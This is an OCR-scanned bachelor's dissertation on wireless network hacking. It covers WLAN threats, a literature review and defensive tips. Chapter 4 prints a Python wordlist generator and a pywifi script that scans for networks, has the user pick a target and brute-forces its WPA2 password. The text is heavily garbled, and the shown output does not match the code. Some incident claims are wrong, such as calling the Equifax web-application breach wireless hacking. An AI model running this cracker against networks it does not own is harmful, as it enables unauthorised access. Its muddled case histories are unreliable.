uféa ua. un. gaet faufaeres, sedla, Hea WaRT
Pandit S. N. Shukla University, Shahdol,M.P.
WIRELESS NETWORK HACKING
A DISSERTATION SUBMITTED IN THE PARTIAL FULFILLMENT OF
REQUIREMENT FOR THE AWARD
OF
BACHELOR OF SCIENCE
IN
COMPUTER SCIENCE
SUBMITTED TO
Pandit Shambhunath Shukla University
Shahdol (M.P.)
SUBMITTED BY:- Sameer Das
Roll No. 21091089
UNDER THE GUIDANCE OF :- Dr.Gauri shanker Kushwaha
DEPARTMENT OF COMPUTER SCIENCE
Pandit Shambhunath Shukla University
‘Shahdol (M.P.)uféa ua. uF. geet faufaeras, sedla, Hea WaRT
Pandit S. N. Shukla University, Shahdol,M.P.
CANDIDATE'S DECLARATION
|, SAMEER DAS, student of Bachelor of Computer Science, Pandit S. N.
Shukla University, Shahdol, hereby declare that the work presented in the
dissertation entitled “WIRELESS NETWORK HACKING” is the outcome of
own Bonafide work, which is correct to the best of my knowledge and this
work has been carried out taking care of computer science ethics. The work
presented does not infringe any previous work and has not been submitted
to any University for the award of any degree/diploma
Sameer Das
(121091089)uféa ua. uF. gaet faufaeraa, edie, Hea WaRT
Pandit S. N. Shukla University, Shahdol,M.P.
DECLARATION
| hereby declare that the work which is being presented in the
dissertation entitled "WIRELESS NETWORK HACKING" in the partial
fulfillment of the requirements for the award of degree of Bachelor of
Computer Science in Pandit Shambhunath Shukla University, Shahdol
submitted to the department of Computer Science is an authentic
record of my own work carried under the guidance of Assistant Prof.
Dr. Gauri Shanker Kushwaha, Department of Computer Science. |
have not submitted the matter embodied in this report for the award
of any other degree.
Supervisor SAMEER DAS
(121091089)
Head of the Department
Department of Computer Scienceuféa ua. un. gaet faufaerea, sedla, Hea Weer
Pandit S. N. Shukla University, Shahdol,M.P.
CERTIFICATE
This is to certify that the work entitled “WIRELESS NETWORK HACKING” is a
bonafide research work carried out independently by Sameer Das, student of
Bachelor of Computer Science in Pandit Shambhunath Shukla University, Shahdol.
In the partial fulfillment of the requirement for the award of the degree of Bachelor
of Computer Science and this dissertation has not formed previously the basis for
the award of any degree, diploma, associateship or any other similar title
according to our knowledge
Guided By: Dr Gauri Shanker
Kushwaha
(Assistant Professor)
Head of the Department:-Pramod
Pandey
Department of Computer
Scienceuféa Ua. un. gaet faufaeres, sedla, Hea WaRT
Pandit S. N. Shukla University, Shahdol,M.P.
APPROVAL CERTIFICATE
The dissertation work entitled “WIRELESS NETWORK HACKING”
being submitted by Mr. Sameer Das (121091089) has been examined
by us and is hereby approved for the award of Bachelor of Computer
Science in Pandit Shambhunath Shukla University, Shahdol.
(Internal Examiner) (External Examiner)
Date: Date:uféa wa. un. aaen faufaare, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
ACKNOWLEDGEMENT
| take the opportunity to express my cordial gratitude to Dr. Gauri Shanker
Kushwaha sir, Associate Professor in the Department of Computer Science .
Pandit S. N. Shukla University, Shahdol for the valuable guidance and inspiration
‘throughout the dissertation work | feel thankful for his innovative ideas, which
led to successful completion of this work.
| give special thanks to Prof. Pramod Pandey sir, Prof. & Head of Department of
Computer Science, Pandit S. N. Shukla University, Shahdol, to always being
willing to help find solutions to any problems | had with my work
lextend my deepest gratitude to Dr. Manish Taram, Assistant professor, Pandit
S.N. Shukla University, Shahdol for providing all the necessary facilities and true
encouraging environment to bring out the best of my endeavors.
| express my gratitude and thanks to all the staff members of Department of
Computer Science for supporting my work and providing me the proper guidance
during my work.
| would like to thank my friends. | am also thankful to my classmates for all the
thoughtful and mind stimulating discussions we had, which prompted us to think
beyond the obvious.
SAMEER DAS
(121091089)‘py Uiea wa. uF. ween faafaarea, edit, Hea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
TABLE OF CONTENTS
CHAPTER-1 INTRODUCTION 1-9
1.17 INTRODUCTION OF WIRELESS NETWORK HACKING 1-3
1.2 ANALYSIS OF WIRELESS NETWORK HACKING 4-6
1.3 METHODS OF WIRELESS NETWORK HACKING a”
CHAPTER-2 LITERATURE REVIEW AND PREVIOUS WORK 30°88
1.1 LITERATURE REVIEW i737
1.2 PREVIOUS WORK
CHAPTER-3 PROBLEM STATEMENT AND PROPOSED WORK 23-26
1.1 Wireless network security issues and threat | 23-24
1.2 Basic WLAN security features 44-26
CHAPTER-4 SIMULATION AND 37-40
RESULT
1.1 DEPENDENCYPYWIFI 27-28
1.2 ATTACK WIFI WITH PYTHON ee
CHAPTER-5 CONCLUSION ara
CHAPTER-6 FUTURE WORK 43-44uféa wa. uf. ween faufaarea, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
CHAPTER-1
INTRODUCTION
1.1 Introduction of Wireless Network Hacking
Wreless local-area networks — often referred to
as WLANs or Wi-Fi networks — are all the rage
these days. People are installing them in their
offices, hotels, coffee shops, and homes.
Seeking to fulfill the wireless demands, Wi-Fi
product vendors and service providers are
popping up just about as fast as the dot-coms
of the late 1990s. Wireless networks offer con-
venience, mobility, and can even be less
expensive to implement than wired networks in
many cases.uféa wa. us. geen faufaarea, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
Given the consumer demand, vendor solutions,
and industry standards, wireless-network
technology is real and is here to stay.
But how safe is this technology?
Wireless networks are based on the Institute of
Electrical and Electronics Engineers (IEEE)
802.11 set of standards for WLANs. In case
you've ever wondered, the IEEE 802 standards
got their name from the year and month this
group was formed — February 1980. The “.11”
that refers to the wireless LAN working group is
simply a subset of the 802 group. There’s a
whole slew ofindustry groups involved with
wireless networking, but the two main players
are the IEEE 802.11 working group and the Wi-Fi
Alliance.uféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
Years ago, wireless networks were only a niche
technology used for very spe-cialized
applications.
These days, Wi-Fi systems have created a
multibillion-dollar market and are being used in
practically every industry and in every size
organization from small architectural
firms to the local zoo.But with this increased
exposure comes increased risk: The widespread
use of wireless systems has helped make them
a bigger target than the IEEE ever bargained for.
(Some widely publicized flaws such as the
Wired Equivalent Privacy (WEP) weaknesses in
the 802.11 wireless-network protocol haven't
helped things,either.) And, as Microsoft has
demonstrated, the bigger and more popular you
are, the more attacks you're going to receive.uféa wa. us. ween faufaare, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
1.2 Analysis of Wireless Network Hacking
Wireless network hacking refers to the process
of gaining unauthorized access to a wireless
network.This can be done through various
methods, such as cracking the network
password, exploiting vulnerabilities in the
wireless router, or using tools such as packet
sniffers and network analyzers to intercept and
manipulate network traffic.
Wireless network hacking can have serious
consequences, including data theft, identity
theft, and damage to the network infrastructure.uféa wa. ua. ween faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
It is illegal and can result in criminal charges
and significant fines.
To prevent wireless network hacking, it is
important to take certain measures, such as:
e Using strong passwords: Use strong, unique
passwords for your wireless network and
change them regularly.
e Keeping software up-to-date: Keep your
wireless router firmware and operating
system updated to ensure that any known
vulnerabilities are patched.uféa wa. ua. geen faufaare, sedi, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
e Disabling unnecessary features: Disable any
unnecessary features on your wireless
router, such as remote access or guest
networks, which can be exploited by
hackers.
e Using encryption: Use encryption such as
WPA2 or WPA3 to secure your wireless
network.
e Limiting signal range: Adjust the signal
range of your wireless network to minimize
the risk of unauthorized access from
outside your premises.uféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
1.3 Methods of Wireless Network Hacking
1. Password cracking: This involves using
tools to guess or crack the wireless network
password. This can be done using brute-
force attacks, dictionary attacks, or other
methods to try out different passwords until
the correct one is found.
2. Rogue access points: An attacker can set
up a rogue access point with a similar name
to a legitimate wireless network to trick
users into connecting to it. Once connected,
the attacker can intercept network traffic
and steal sensitive information.uféa wa. ua. ween faufaarea, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
3. Packet sniffing: This involves capturing
and analyzing network traffic to identify
login credentials, passwords, and other
sensitive information.
4. WEP/WPA cracking: Older wireless
networks use WEP (Wired Equivalent
Privacy) or WPA (Wi-Fi Protected Access)
encryption, which can be vulnerable to
cracking if the attacker has enough
resources and time.
5. Man-in-the-middle attacks: = This
involves intercepting and altering network
traffic between the user and the wireless
network,uféa wa. ua. geen faufaarea, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
allowing the attacker to steal sensitive
information or inject malware into the
victim's device.
6. Denial of Service (DoS) attacks: This
involves flooding the wireless network with
traffic, causing it to become unavailable or
crash, preventing legitimate users from
accessing it.
7. Wireless jamming: This involves using
specialized equipment to jam or disrupt
wireless signals, preventing legitimate users
from accessing the network.uféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
Chapter-2
The KirtiRaj Bhatele, et al., presented hybrid
security protocol for better security using a
combination of both symmetric and asymmetric
cryptographic algorithms. In this hash value of
the decrypted message using AES algorithm is
calculated using MD5 algorithm. This hash value
has been encrypted with dual RSA and the
encrypted message of this hash value also sent
to destination. Now at the receiving end, hash
value of decrypted plaintext is calculated with
MDS and then it is compared with the hash
value of original plaintextuféa wa. ua. geen faufaare, sedis, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
which is calculated at the sending end for its
integrity. By this we are able to know whether
the original text being altered or not during
transmission in the communication
medium.Arash Habibi Lashkari, et al.,presented
a survey on wireless security protocols (WEP,
WPA and WPA2/802.11i). Here WEP protocol
types, weaknesses and enhancements, WPA
protocol types, WPA improvements such as
cryptographic message integrity code or MIC,
new IV sequencing discipline, per packet key
mixing function and rekeying mechanism. They
also explained major problems on WPA that
happened on PSK part of algorithm.uféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
Finally paper explained third generation of
wireless security protocol as
WPA2/802.11i.Gamal Selim, et al., [9] explained
various types of security attacks modification,
fabrication, interception, brute force,
maintainability and static placement of MIC.
They surveyed currently available security
protocols i.e. WEP, WEP2, WPA and WPA2.
They also proposed a new mechanism called
multiple slot system (MSS). MSS makes use of
the key selector, slot selector and MIC shuffle
selector. MSS uses one of four encryption
algorithm RC4, RSA, Blowfish and AES.Hyung-
Woo Lee, et al.,uféa wa. ua. geen faufaare, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
explained various issues and challenges in
wireless sensor network. Paper explained two
types of wireless security attacks — one is the
attack against the security mechanisms and
another is against the basic mechanisms like
routing mechanism. Major attacks explained are
denial of service attack, attacks on information
in transit, sybil attack, hello flood attack,
wormhole attack, blackhole/sinkhole attack.
Paper also explainedthe various security
schemes for wireless sensor networks like
wormhole based, statistical en-route filtering,
random key and tinysec. Holistic view of
security in wirelessuféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
sensor networks is also described.Lifeng Sang,
et al., proposed shared secret free security
infrastructure for wireless networks based on
two physical primitives: cooperative jamming
and spatial signal enforcement. Cooperative
jamming is for confidential wireless
communication and spatial signal enforcement
is for message authenticity. Proposed
infrastructure provides confidentiality, identity
authentication, message authentication,
integrity, sender non-repudiation, receiver non
tepudiation and anonymity.Andrew Gin, et al.,
compared the performance analysis of evolving
wireless 802.11 security architecture. Paper
explained wireless network security methods.uféa wa. ua. geen faufaare, sedis, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
Paper explained security layers like WEP shared
key authentication and 40 bit encryption, WEP
shared key authentication and 104 bit
encryption, WPA with PSK authentication and
RC4 encryption, WPA with EAP-TLS
authentication and RC4 encryption, WPA2 with
PSK authentication and AES encryption and
WPA2 with EAP-TLS authentication and AES
encryption. Effects on throughput are also
discussed.Eric Sabbah, et al., [13] explained
attacker motivation, vulnerabilities | and
opportunities currently available to hackers.
Wireless sensor networks are exposed to
numerous security threats that can endanger
the success of the application.uféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
Paper explains that security supports in wireless
network is challenging due to the limited energy,
communication bandwidth and computational
power. Security issues and currently available
solutions, various types of attacks like - attacks
on routing and DoS attack, injecting false
packets, attacks on real time requirements,
attacks on the network using topological
information, attacks on localization.
Floriano De Rango et. al.,proposed static and
dynamic 4 - way handshake solutions to avoid
denial of service attack in WPA and IEEE
802.111. Paper also explained DoS and DoS
flooding attacks against IEEE 802.111 4-way
handshake.uféa wa. ua. geen faufaare, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
Paper also compared static versus dynamic
resource oriented solutions for the 4 way
handshake.Stephen Michell, et al., proposed
state based key hope protocol (SBKH) that
provides a lightweight encryption scheme for
battery operated devices such as the sensors in
a wireless sensor network as well as small
office, home office (SOHO) users.
State based key hope protocol implements
encryption in a novel state based way so as to
provide cheap and robust security without
additional overheads of encryption.
Implementation of SBKH on real hardware is a
challengeuféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
Previous wort
Wireless network hacking involves gaining
unauthorized access to wireless networks,
such as Wii, Bluetooth, and cellular
networks. This type of hacking is typically
used for malicious purposes, such as
stealing sensitive information, disrupting
network services, or launching attacks on
other devices.
One of the most well-known wireless
network hacking incidents occurred in 2017
when hackers exploited a vulnerability in the
Equifax web application to gain access to
personal information of millions of people.uféa wa. ua. geen faufaare, sedis, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
The hackers were able to steal names,
Social Security numbers, birth dates, and
other sensitive information.
Another notable example is the 2014 Sony
Pictures hack, where a group of hackers
known as "Guardians of Peace" breached
the company's network and stole sensitive
data, including unreleased films,
confidential documents, and employee
information.
A4Wireless network hacking can be
accomplished using various methods. One
of the most common is a brute force attack,uféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
which involves trying numerous
combinations of usernames and passwords
until the correct one is found. This method
is often successful when users have weak
passwords or when the — network
administrator has not enforced password
policies.
One of the most famous cases of wireless
network hacking occurred in 2005, when a
group of hackers known as_ the
"warchalkers" gained unauthorized access
to a wireless network belonging to the
retailer TJX Companies.uféa wa. ua. geen faufaare, sedis, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
The group was able to steal data from the
company's computer systems,
including credit card information from
millions of customers. The incident is
considered one of the largest data breaches
in history and resulted in millions of dollars
in damages.
Wireless network hacking continues to be a
major threat to organizations and
individuals alike. Hackers are constantly
developing new techniques and exploits to
gain unauthorized access to wireless
networks. As a result,uféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
it is important for organizations and
individuals to take steps to protect
themselves against these threats.
This includes using strong passwords,
keeping software and firmware up-to-date,
and using encryption to protect data
transmitted over wireless networks.
Additionally, organizations should consider
using network security tools, such as
firewalls and intrusion detection systems, to
help identify and prevent attacks.uféa wa. ua. ween faufaare, sedis, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
CHAPTER - 3
PROBLEM STATEMENT
Wireless network security issues and threat
The three most common WLAN security threats
include:
1.denial of service attacks - where the intruder
floods the network with messages affecting
the availability of the network resources
2.spoofing and session hijacking - where the
attacker gains access to network data and
resources by assuming the identity of a
valid useruféa wa. ua. ween faufaarea, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
3.eavesdropping - where unauthorised third
parties intercept the data being transmitted
over the secure network
To counter these threats, you should make every
effort to configure your WLAN correctly. You
should also enable a range of security features,
such as standard authentication and encryption,
alongside other access control mechanisms.
Proposed work
Basic WLAN security features
1.Early WLAN hardware used a number of
basic security methods, including:uféa wa. ua. geen faufaarea, sedia, Fea eet
Pandit S. N. Shukla University, Shahdol,M.P.
2.Service Set Identifiers (SSIDs) - these
prevent connection to access points unless
a device uses a given identifier correctly
3.Media Access Control (MAC) - this involves
using addresses attached to each device to
limit connection to access points
4.Wired Equivalent Privacy (WEP) - WEP uses
encryption keys so that only devices with
the correct key can communicate with
access points
WEP still exists in many devices as users have
found compatibility problems when introducing
new equipment.uféa wa. ua. ween faufaarea, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
However, WEP has been proven ineffective
against hackers.
You should consider upgrading any devices
relying on this technology.
Even with all these security measures combined,
basic WLAN features cannot guarantee that
your network will remain secure. What is more,
WLAN equipment often comes with security
measures switched off entirely. If you don't
switch these on, then you have absolutely no
security at all.uféa wa. ua. aaen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
Chapter-4
STIMULATION AND RESULT
1.1 Dependency pywifi
pywifi provides a cross-platform Python module
for manipulating wireless interfaces. Easy to
use; Supports Windows and Linux.
Construct a wifi dictionary
Including numbers (0-9), letters (a-z, A-Z),
special characters (|@#$%"&*()_+=-)
A normal password consists of 8 characters
with only numbers and small letters so we could
pick any random combination of those and store
them in to a .text file.uféa wa. ua. geen faufaare, sedis, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
A normal password consists of 8 characters
with only numbers and small letters so we could
pick any random combination of those and store
them in to a .text file.
import itertools as its
words =
"1234567890abcdefghijklmnopqrstuvwxyz" # a
set of password characters
rt =its.product(words,repeat=8) # random
combination of 8 characters
dic = open("pwd.txt’,a’) # store wifi
combinations in file
foriinr:
dic.write(""join(i))
dic.write(".join("\n"))
dic.close()ufea Ua. Us. xiao faafaenea, wedie, Het Wer
Pandit S. NC Shukla University, Shahdol,M.P.
3.2 Attack Wifi with Python
create a file main.py
import pywifi
import time
from pywifi import const
# WiFi scanner
def wifi_scan():
# initialise wifi
wifi = pywifi.PyWiFi()
# use the first interface
interface = wifi.interfaces()[0]
# start scan
interface.scan()
fori in range(4):
time.sleep(1)uféa wa. ua. geen faufaare, sedis, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
print(\rScanning WiFi, please wait... (' +
str(3 - i), end=') ')
print(‘\rScan Completed! \n' + -' * 38)
print(\r:4}{:6}}'.format(No.’, ‘Strength’, ‘wifi
name’)
# Scan result, scan_results() returns a set,
each being a wifi object
bss = interface.scan_results()
# a set storing wifi name
wifi_name_set = set()
for w in bss:
# dealing with decoding
wifi_name_and_signal = (100 + w.signal,
w.ssid.encode(‘raw_unicode_escape’).decode(‘u
tf-8'))uféa wa. ua. ween faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
wifi_name_set.add(wifi_name_and_signal)
# store into a list sorted by signal strength
wifi_name_list = list(wifi_name_set)
wifiname_list = — sorted(wifi_name_iist,
key=lambda a: a[0], reverse=True)
num = 0
# format output
while num < len(wifi_name_list):
print(\r{:<6d}{:<8d}{}'.format(num,
wifi_name_list[num][0], wifi_name_list[num][1]))
num += 1
print(- * 38)
# return wifi list
return wifi_name_list
# WIFI cracking function
def wifi_password_crack(wifi_name):uféa wa. ua. geen faufaare, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
# password dictionary file
wifi_dic_path = input("Please use filename of
password dictionary used for the brute force
attack: ")
with open(wifi_dic_path, 'r’) as f:
# loop through all combinations
for pwd in f:
# strip of the trailing new line character
pwd = pwd.strip(‘\n’)
# initialise wifi object
wifi = pywifi.PyWiFi()
# initialise interface using the first one
interface = wifi.interfaces()[0]
# disconnect all other connections
interface.disconnect()uféa wa. ua. aaen faufaare, sedia, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
# waiting for all disconnection to complete
while interface.status() == 4:
# break from the loop once all
disconnection complete
pass
# initialise profile
profile = pywifi.Profile()
# wifi name
profile.ssid = wifi_name
# need verification
profile.auth = const.AUTH_ALG_OPEN
# wifi default encryption algorithm
profile.akm.append(const.AKM_TYPE_WPA2PS
K)uféa wa. ua. ween faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
profile.cipher = const.CIPHER_TYPE_CCMP
# wifi password
profile.key = pwd
# remove all wifi connection profiles
interface.remove_all_network_profiles()
# set new wifi connection profile
tmp_profile =
interface.add_network_profile(profile)
# attempting new connection
interface.connect(tmp_profile)
start_time = time.time()
while time.time() - start_time < 1.5:
# when interface connection status is
4, it succeeds
# greater than 1.5s normally means the
connection faileduféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
# normal successful connection is completed
in 1.5s
# increase the timer to increase the
accuracy at the cost of slower speed
if interface.status() == 4:
print(f\rConnection Succeeded !
Password: {pwd}')
exit(0)
else:
print(f'\rTrying with {pwd}', end=")
# main execution function
def main():
# exit signal
exit_flag = 0uféa wa. un. geen faufaare, edit, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
# target number
target_num = -1
while not exit_flag:
try:
print(WiFi keys'.center(35, -’))
# use the scanner module , to get a
sorted wifi list
wifi_list = wifi_scan()
# let the user pick the wifi number, and
handle error cases
choose_exit_flag = 0
while not choose_exit_flag:uféa wa. ua. geen faufagrea, edie, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
try:
targetnum = __ int(input(‘Please
choose a target wifi: '))
# choose wifi in the list, go into second
confirmation or ask for input again
if target_num in range(len(wifi_list)):
# double-confirm
while not choose_exit_flag:
try:
choose = _ str(input(f'The
chosen target wifi is
{wifi_list[target_num][1]}, Sure? (Y/N) '))uféa wa. ua. aaen faufagrea, edie, Fea Weer
Pandit S. N. Shukla University, Shahdol,M.P.
# lower case the confirmation input
if choose.lower() == 'y:
choose_exit_flag = 1
elif choose.lower() == 'n’:
break
# exception handling
else:
print(only Y/N pls! o(* —
~ *)o+)
# exception handling
except ValueError:
~~
print(‘only Y/N pls! o(*
*)o’)uféa wa. un. geen faufaarea, edie, Fea WeRT
Pandit S. N. Shukla University, Shahdol,M.P.
# exit
if choose_exit_flag == 1:
break
else:
print(Please choose a_ target
wifi: ')
except ValueError:
print(Please only enter a number: ')
# start cracking, use the chosen wifi
name
wifi_password_crack(wifi_list[target_num]|1])
print(’-' * 38)
exit_flag = 1uféa wa. us. aaen faufaare, edie, Fea Weer
Pandit S. N. Shukla University, Shahdol,M.P.
except Exception as e:
print(e)
raise e
if __name_ =='_main_':
main()
Qutput
Enter 1st number :
Enter 2nd number:uféa wa. ua. ween faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
Chapter-5
CONCLUSTON
e WEP has a long history of vulnerabilities and
"fixes"
e WEP is a good example of how attacks
evolve and mature over time
e Attacks that a few years ago took days, now
take minutes if the right tools are useduféa wa. ua. aaen faufaarea, sedis, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
e 2005 WEP is officially declared deprecated
by IEEE 802.11 committee
e 2008 WEP used by 30% of users in US
University
e Today - too many old networks, some using
WEP
e WEP must be abandoned once and for all,
rather than patch it yet again !!uféa wa. ua. geen faufaare, sedis, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
Chapter-6
ulure work,
Wireless Network Hacking Future
future work in wireless network hacking may
include:
1.The use of machine learning algorithms and
artificial intelligence to automate and
optimize the process of hacking wireless
networks.
2.The development of new attack vectors,
such as_ exploiting vulnerabilities in
emerging wireless technologies like 5G and
the Internet of Things (loT).uféa wa. ua. geen faufaare, sedia, Fea weet
Pandit S. N. Shukla University, Shahdol,M.P.
3.The exploration of new attack surfaces
beyond traditional wireless networks, such
as Bluetooth and Near Field Communication
(NFC).
4.The development of new techniques for
bypassing network defenses, such as
encryption and authentication protocols.
5. The use of social engineering and other non-
technical tactics to gain access to wireless
networks, such as phishing and pretexting